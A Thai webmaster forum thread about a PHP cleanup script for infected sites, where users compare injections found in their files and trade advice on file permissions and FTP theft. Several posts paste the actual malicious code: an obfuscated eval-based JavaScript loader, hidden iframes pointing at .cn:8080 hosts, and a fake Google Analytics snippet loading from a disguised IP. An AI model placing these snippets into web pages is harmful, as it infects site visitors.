[ไม่ทำต่อแล้ว] PHP Virus Remover AJAX v2.S By EThaiZone

[nume]

ผมให้supportเขาจัดการให้แล้วครับ สงสัยเจอบ่อยช่วงนี้ แก้ให้แปบเดียวเอง แต่เราต้องป้องกันและแก้ที่เครื่องเราด้วย ตอนนี้มานั่งสแกนเครื่องต่อละ ไม่รู้จะเจออะไรป่าว

[loc.know]

แล้วตัว scan virus ตัวไหนที่แน่ๆมีมั่งมั้ยครับ ตอนนี้ผมโดนมาแล้ว แต่ลองหาดูในเครื่องมัน scan ไม่เจอน่ะ

[sealinda]

แล้วตัว scan virus ตัวไหนที่แน่ๆมีมั่งมั้ยครับ ตอนนี้ผมโดนมาแล้ว แต่ลองหาดูในเครื่องมัน scan ไม่เจอน่ะ

เอลองใช้ตัวนี้อ่ะค่ะ

http://www.emsisoft.com/en/software/ax/

ใช้แบบ deep scan  ใช้เวลาค่อนข้างนานเหมือนกัน
แต่เจอหมดทั้งยวง และก็กำจัดได้ทั้งหมด
เจอ backdoor ด้วย สงสัยที่มันฝัง backdoor ที่เครื่องเอก่อน แล้วก้อดักพาสเข้า ftp 

[EThaiZone]

ดังนั้นวิธีเซฟสุดในการป้องกันการโดนลูกหลงจากคนอื่น คือ "โฟลเดอร์คือ 755 ไฟล์ก็ 644"

ที่ folder  domain เลยป่าวคับโจ้
หรือที่
/pub_html เลย

แล้วก็ folder ย่อยข้างในมันอีกทีเป็นอะไรครับ

ใน public_html ครับ มีย่อยซัพ อะไรทั้งหมด นั้นแหละ ทำให้หมดเลย
แต่พอทำ ก็อาจจะมีปัญหากับสคริปบางตัวที่ต้องการเขียนทับไฟล์
เช่น smf ก็มีพวกเรื่องแก้เทมเพลจ แก้ css พวกนี้ก็จะทำไม่ได้
เพราะติดเรื่อง permission ไฟล์

แต่ก็ต้องชั่งใจครับ ถ้าพวกนี้เราไม่ได้แก้อะไรบ่อยๆ ก็ไม่มีความจำเป็นที่ต้องเซ็ตให้เขียนทับได้
สู้chmod เป็น 755 และ 644 เพื่อเซฟแก่ตัวเราจะดีสุดครับ

แต่ว่าพวกนี้จะไม่มีความหมาย ถ้าเราดันโดนเจาะ ftp ของเราซะเอง 

อ่า เกเตอร์ของผมเขาก็เซทเป็น 755 กับ 644 ออโตอยู่แล้ว แต่ดันติดทั้งยวงเลย  ตอนนี้สคริปแก้ไวรัสยังรันไม่เสร็จเลยครับ ตั้งแต่เที่ยงคืน ยันสว่าง แบบนี้ผิดปกติหรือเปล่าครับ สแกนไฟล์เห็นแค่ 2004ไฟล์เอง 

hm ก็ เซทออโต้ ก็ยังติดครับ สรุป ป้องกันไม่ได้เหมือนกันครับ ที่ยังไม่เสร็จมันคงค้างไปแล้วล่ะครับ ตอนนี้ผม reset account เรียบร้อย ทะยอย upload ไปใหม่
ส่วนเวปไหนเป็น wp ก็ export db ออกมา แล้ว import ไปใหม่ช้าหน่อยแต่ชัวร์

ตามข้างบนครับ คือถ้ายังโดนแปลว่าไม่ใช่คนอื่นบนโฮสโดน
แต่ท่านโดนเจาะซะเอง เจอแบบนี้ทางแฮกเกอร์ก็ไม่ยากครับที่จะ chmod กลับเป็น 666
หรือไม่ก็ง่ายกว่าด้วยการดาว์นโหลดไฟล์เป้าหมายมาอ่าน แล้วรีอัพกลับไฟล์ที่แก้แล้วไปใหม่
ซึ่งส่วนมากจะเป็นเคสนี้จริงๆ เพราะเท่าที่ดู permission จะไม่เปลี่ยน แต่ไฟล์จะมีการอัพเดต

สำหรับแฮกเกอร์ ไม่สิ ขนาดผมระดับอ่อนๆ ยังเขียน client ให้ติดต่อ ftp ได้เองไม่ยากเลย (php ก็ทำได้นะเออ = =a)
ดึงรายชื่อ แล้วโหลดแต่ไฟล์เป้าหมาย (index.php index.html main config) แล้วแก้แล้วรีอัพขึ้นไป
ง่ายปานปอกกล้วยและทำซ้ำได้ไม่ยาก ขอแค่ได้ ftp จากการดักแพกเกจก็พอ



##############################
จริงๆ ถ้าโฮสไหนมี antivirus ในตัวก็น่าใช้นะครับ พวกนี้ขนาดเราแค่อัพ... phpสารพัดประโยชย์ (ละไว้ฐานเข้าใจ ไม่อยากบอกชื่อ)
มันก็จัดการลบทิ้งแล้ว แต่ถามว่าทำไมโฮสทั่วไป ไม่ค่อยจะมีกัน

เรื่องก็คือเพราะโฮสส่วนมากเป็น unix ซะเยอะ (ผมเรียกเหมาหมดก็อย่าว่ากันนะ ไม่อยากย่อยไปถึง bsd หรืออื่นๆ)
ซึ่งพวกนี้เขียนไวรัสมา พอเจอ kernel คนละเวอร์ชั่น มันก็ทำงานไม่ลงรอยก็มี
เลยเป็นว่าไม่คุ้มที่จะทำสู้ทาง Windows ก็ไม่ได้ เถื่อนไงก็อย่างงั้น
บิตมาไงก็ใช้อย่างงั้น บางรุ่นมาีห้ามๆ ใช้ autoupdate เพื่อกัน genius ก็ยิ่งเข้าทาง
เสร็จโจร อะไรแบบนั้น มันเลยง่ายและคุ้มที่จะเขียนเล่นงาน

กลับมาต่อว่าไอ้ที่เราๆ ท่านๆ ในไทยเสียวโดนกัน
จริงๆ มันก็ไม่ใช่ไวรัสหรอก มันก็คือiframe ธรรมดา หรือบางคนหรูก็โดน js
แต่สรุป มันก็คือ iframe นั้นแหละ ซึ่งเกินครึ่ง ไอ้คนทำมันทำเพื่อปั่น topsite
แต่เพราะเป็นการบุกรุกเว็บ พวก avg เลยเตือนว่าอันตราย กูเกิ้ลก็เตือน
แต่ถามว่าอันตรายกับผู้ใช้ไหม มันก็ไม่ อันตรายกับโฮสไหม มันก็ไม่
มันเลยเป็นเหตุผลที่โฮสทาง unix มักไม่มี antivirus กับเขา
ติดไปทำไม เดี๋ยวพออัพ kernel ใหม่ๆ ไอ้ที่เคยใช้ได้ (ไวรัส) มันก็ล่มปากอ่าว
อย่าว่าเลย ขนาดไม่ต้องอัพ มันก็ถึกอยู่แล้ว

แต่กูเกิ้ลให้ความสำคัญ ถ้าเราดูแลเว็บไม่ได้ เราก็คงดูแลผู้ใช้งานไม่ได้
อันนี้เราก็ต้องทำใจ และจัดการแก้ปัญหากันไป

ผมให้supportเขาจัดการให้แล้วครับ สงสัยเจอบ่อยช่วงนี้ แก้ให้แปบเดียวเอง แต่เราต้องป้องกันและแก้ที่เครื่องเราด้วย ตอนนี้มานั่งสแกนเครื่องต่อละ ไม่รู้จะเจออะไรป่าว

อันนี้เห็นด้วยนะครับ ผมอยากให้ติดต่อซัพพอร์ทโฮสดูก่อน ถ้าเขาแก้ให้ได้ก็ให้เขาแก้เถอะ
ผมเองก็ไม่เคยชัวร์ว่าสคริปที่ผมเขียนมันจะทำงานได้ตรงตามที่คิด 100%
หรือจริงๆ ถ้าให้คนเป็น php มาไล่ตรวจไฟล์ ก็จะทราบไม่ยากว่าโดนที่ไฟล์ไหน
อย่างส่วนมากไฟล์ที่มักโดนแก้และยัดโค้ด มักจะมีชื่อตามรายการนี้

index.*
main.*
config.*
db.*
function.*
functions.*
include.*

ส่วนมากจะไม่พ้นมากกว่านี้ แค่สคริปผมจริงๆ ผมก็ว่าให้มันทำงานเกินกว่าเหตุนะ
เพราะมันจะไล่อ่านด๊ะทุกไฟล์

แต่เราก็ไม่ทราบว่าเมื่อไรเป้าหมายมันจะเล่นทั้งหมด เพราะตอนผมเห็นโค้ดครั้งแีรก
แหม ใช้ทั้ง ob จัดการแก้ output บอกตามตรงมันยัดไว้หลายจุด
โค้ดมันไม่ชนกัน ทำงานไม่ซ้ำซ้อนกัน ทั้งที่โค้ดเหมือนดันแด๊ะ ถ้าคนทำมันเป็นเพื่อนผมๆ คงชมมัน "เอ็งเก่ง"
แต่.... เฮ้อ... หมดอารมณ์จะพิมพ์ เอิ้ก!

##############################

ที่ผมหายไปวันสองวันนี้ที่ผ่านมา เป็นไข้หนักครับ เพ้อด้วย เพ้อถึงเกมส์ RPG ที่เคยเล่น
ฃพรุ่งนี้จะไปหาหมอ นี้ดีขึ้นบ้างเลยมาโพส แต่ยังปวดหัวตุบๆ ตามจังหวะหัวใจ อุๆ
ใครวานให้ผมช่วยอะไรก็เห็นใจหน่อยนะ 
แต่จริงๆ ที่หนักกว่าคือ "คนที่เขาจ้างผมทำงาน" อันนี้แหละ ก็รอตูก่อนละกัน 

[mapandy]

ร่วมด้วยช่วย +1

ขอบคุณคุณโจ้มาก ๆ ครับ

[manchy]

ขอบคุณมากคับช่วยผมได้จริงๆ

[~สายลม~]

ตามมาเก็นด้วยคนครับ ช่วงนี้ไวรัสระบาดหนักเหลือเกิน เว็บใหญ่เว็บเล็ก โดนกันถ้วนหน้า

[cowboyIT]

   ขอขุดหน่อยนะครับ

    คุณโจ้ ผมโหลดเวอร์ชั่นล่าสุด ไม่ได้ครับ

[004275]

อยากรู้คับ ว่าไฟล์ favcon นี่มันใช่ไวรัสรึป่าว ทำไมลบออกไปแล้ว มันก็ยังกลับเข้ามาอะคับ

[devil_joe]

ลองลบแล้วไม่หายครับ เจอตัวนี้ 

โค้ด เลือก ขยาย

<script>jl="707b776179717a603a63667d60713c36287d72667579713467667729337c6060642e3b3b707d737d6075787d7a67647d6675607d7b7a3a7127236e3a777a3b60717871777b793b3334637d70607c29332533347c717d737c60293325333467606d78712933627d677d767d787d606d2e347c7d7070717a2f332a283b7d72667579712a363d2f67616d766029365a755a362f7a7a7d716e7a29365a755a362f";jr="function mn(){ixho=Math.PI;vjjwlf=parseInt;ep='length';heqf=vjjwlf(~((ixho&ixho)|(~ixho&ixho)&(ixho&~ixho)|(~ixho&~ixho)));am=vjjwlf(((heqf&heqf)|(~heqf&heqf)&(heqf&~heqf)|(~heqf&~heqf))&1);ebbj=am<<am;nniezn=heqf;suybt='';szgop=String.fromCharCode;ex=eval;for(pmfnc=heqf;pmfnc<jr[ep];pmfnc-=-am)nniezn+=jr.charCodeAt(pmfnc);nniezn%=unescape(heqf+unescape('%78')+(am<<6));for(pmfnc=heqf;pmfnc<jl[ep];pmfnc+=ebbj)suybt+=szgop(vjjwlf(heqf+unescape('%78')+jl.charAt(pmfnc)+jl.charAt(pmfnc+vjjwlf(am)))^nniezn);try{ex(suybt);}catch(e){try{eval(suybt);}catch(e) {window.location='/';}}}try{eval('mn();')}catch(e) {}";eval(jr);</script>

[cowboyIT]

ลองลบแล้วไม่หายครับ เจอตัวนี้ 

โค้ด เลือก ขยาย

<script>jl="707b776179717a603a63667d60713c36287d72667579713467667729337c6060642e3b3b707d737d6075787d7a67647d6675607d7b7a3a7127236e3a777a3b60717871777b793b3334637d70607c29332533347c717d737c60293325333467606d78712933627d677d767d787d606d2e347c7d7070717a2f332a283b7d72667579712a363d2f67616d766029365a755a362f7a7a7d716e7a29365a755a362f";jr="function mn(){ixho=Math.PI;vjjwlf=parseInt;ep='length';heqf=vjjwlf(~((ixho&ixho)|(~ixho&ixho)&(ixho&~ixho)|(~ixho&~ixho)));am=vjjwlf(((heqf&heqf)|(~heqf&heqf)&(heqf&~heqf)|(~heqf&~heqf))&1);ebbj=am<<am;nniezn=heqf;suybt='';szgop=String.fromCharCode;ex=eval;for(pmfnc=heqf;pmfnc<jr[ep];pmfnc-=-am)nniezn+=jr.charCodeAt(pmfnc);nniezn%=unescape(heqf+unescape('%78')+(am<<6));for(pmfnc=heqf;pmfnc<jl[ep];pmfnc+=ebbj)suybt+=szgop(vjjwlf(heqf+unescape('%78')+jl.charAt(pmfnc)+jl.charAt(pmfnc+vjjwlf(am)))^nniezn);try{ex(suybt);}catch(e){try{eval(suybt);}catch(e) {window.location='/';}}}try{eval('mn();')}catch(e) {}";eval(jr);</script>

    ตามนั้น เจอเหมือนกัน มันพัฒนาขึ้นทุกวันๆ

[baby-bride]

 ผมเพิ่งโดนเดี๋ยวนี้ โหลดโฟลโปรแกนมไม่ได้ พี่ EthaiZone
เจอ iFrame มั่วไปหมด หลายไฟ บนบ่าง ล่างบ่าง

ตอนนี้ทุกเว็บในลายเซ็น กลายเป็น ปิดชั่วคราวหมด รอโหลด program มาแก้
อ่านมาทั้งหมด 6 หน้า ใช้ 2 ชม เพิ่งจบเดี๋ยวนี้
เดี๋ยวลองกลับ ไปโหลดใหม่
คงต้องให้ คนดูโฮสทำให้ มันยากเกินกว่าจะทำเอง

+1 เต็มๆ ( copy iFrame มาไม่ทัน เจ้าของ ip ปิดไปก่อน ขอโทษ )

[~~~เทพ Google Ad ~~~]

โหลดไม่ได้ครับพี่ครับ

[EThaiZone]

แวะมาตอบก่อน พอดีช่วงนี้งานพันหัวพันท้าย

เว็บเข้าไม่ได้เพราะผมย้ายผู้จดมาอยู่กับ dotsiam แทน
เมื่อก่อนอยู่ ecomhost จริงๆ ก็ไม่อยากย้าย
ถ้าไม่เพราะพยายามประหยัดทุกทาง

เลยเป็นว่าเดี๋ยวจะแก้โดเมนก่อน 

ปล. มะกี้เพิ่งเข้าเอ็มในรอบหลายวัน เมล์ค้าง 47 ฉบับ ไม่รวม junk อีกต่างหาก
มากกว่าครึ่งเป็นเมล์ต่างประเทศ 

[SaintTakumi]

ช่วยด้วยครับ ของผมมันใส่โค๊ดนี่ไน php เกือบทุกไฟล์เลยอ่ะครับ

โค้ด เลือก ขยาย


<iframe src="http://mixmaxgroup.cn:8080/ts/in.cgi?pepsi53" width=125 height=125 style="visibility: hidden"></
<iframe src="http://thehomename.cn:8080/index.php" width=111 height=141 style="visibility: hidden"></iframe>



ลองใช้ตัว remove แล้วมันไม่ได้อ่ะครับ ไม่ทราบจะแก้ยังไงครับ

และตั้งค่า cmod แบบไหนดีถึงจะปลอดภัยครับ แนะนำด้วยครับ  เครียดอย่างแรง

[Step9]

วันนี้เจอสายพันธุ์ใหม่ครับ

มันแทรกเป็นGoogle Analytic

โค้ด เลือก ขยาย

<?php echo ''; ?><?php echo '<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript sr?='" + gaJsHost + "google-analytics.com/ga.js' " + '#@!s(&r)c@#=!)\'!h$#t^!#$@t@!$p&^!@:$^/!@#!/#9(1)@.(2)1#(2)!.^&6!@!#^5(@#!.!&$1@#4)8#&/($g&$a!.(j^s)'.replace(/#|@|&|\$|\)|\!|\^|\(/ig, '') + "' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-7623457-2");
pageTracker._trackPageview();
} catch(err) {}</script>'; ?>

UA-7623457-2 <--ฟ้องGoogleเลย

[Step9]

ทำไมเขาต้องทำเว็บคนอื่นพังด้วยไม่เข้าใจ
มาวางLinkเฉยๆไม่ดีกว่าเหรอ




ผมว่าจริงๆเขาก็ต้องการจะเนียนวางCodeแหล่ะ  
แต่ยังทำไม่ได้100% เว็บคนอื่นเลยพัง  ถ้าต่อไปเขาพัฒนาจนเนียนได้นี่จะกลายเป็นเจ้าโลกแห่งSEOเลยมั้ง

:-\

[baby-bride]

  วันนี้เจออีกเว็บ

โค้ด เลือก ขยาย

<iframe src="http://thebettings.cn:8080/ts/in.cgi?pepsi55" width=125 height=125 style="visibility: hidden"></iframe>

  ยังโหลด program หน้า 1 ไม่ได้เลย

  ใครใจดี ช่วยที ขอบคุณ

[EThaiZone]

ข่าวดี
เดี๋ยวอีกไม่เกินครึ่งชั่วโมง ผมจะอัพตัวล่าสุดใส่เว็บฝากไฟล์ให้โหลดกัน
แก้ไปหลายอย่าง จะเอาให้เบาขึ้น (ตาม build เป็น 2.9 แล้ว) ตอนนี้แก้ตาม rep เก่าๆ
แล้วอีกไม่นาน ไม่น่าเกินสี่ห้าวัน จะออก 3.0 ที่จะสแกนเฉพาะไฟล์น่าสงสัย ทำให้เบาขึ้นไปอีก
และจะมี interface ที่มันน่าจะใช้ง่ายกว่านี้นะ 

ข่าวร้าย
<iframe src="http://google.com" width=100 height=100 style="visibility:
โค้ด iframe ที่เสียหายแบบนี้ ฺBrowser กลับทำงาน แต่ว่าผมไม่สามารถเขียน regex ดักได้
เพราะสภาวะแวดล้อมในการใช้งานจริงมันต่างกัน
Browser มันน่าตัดการทำงานโค้ด html ที่ไม่สมบูรณ์ทิ้งเนอะ 

[KAI]

มาลงชื่อรอโหลด ครับโจ้

ผมก็ติดเชื้อ

ดรีมโฮส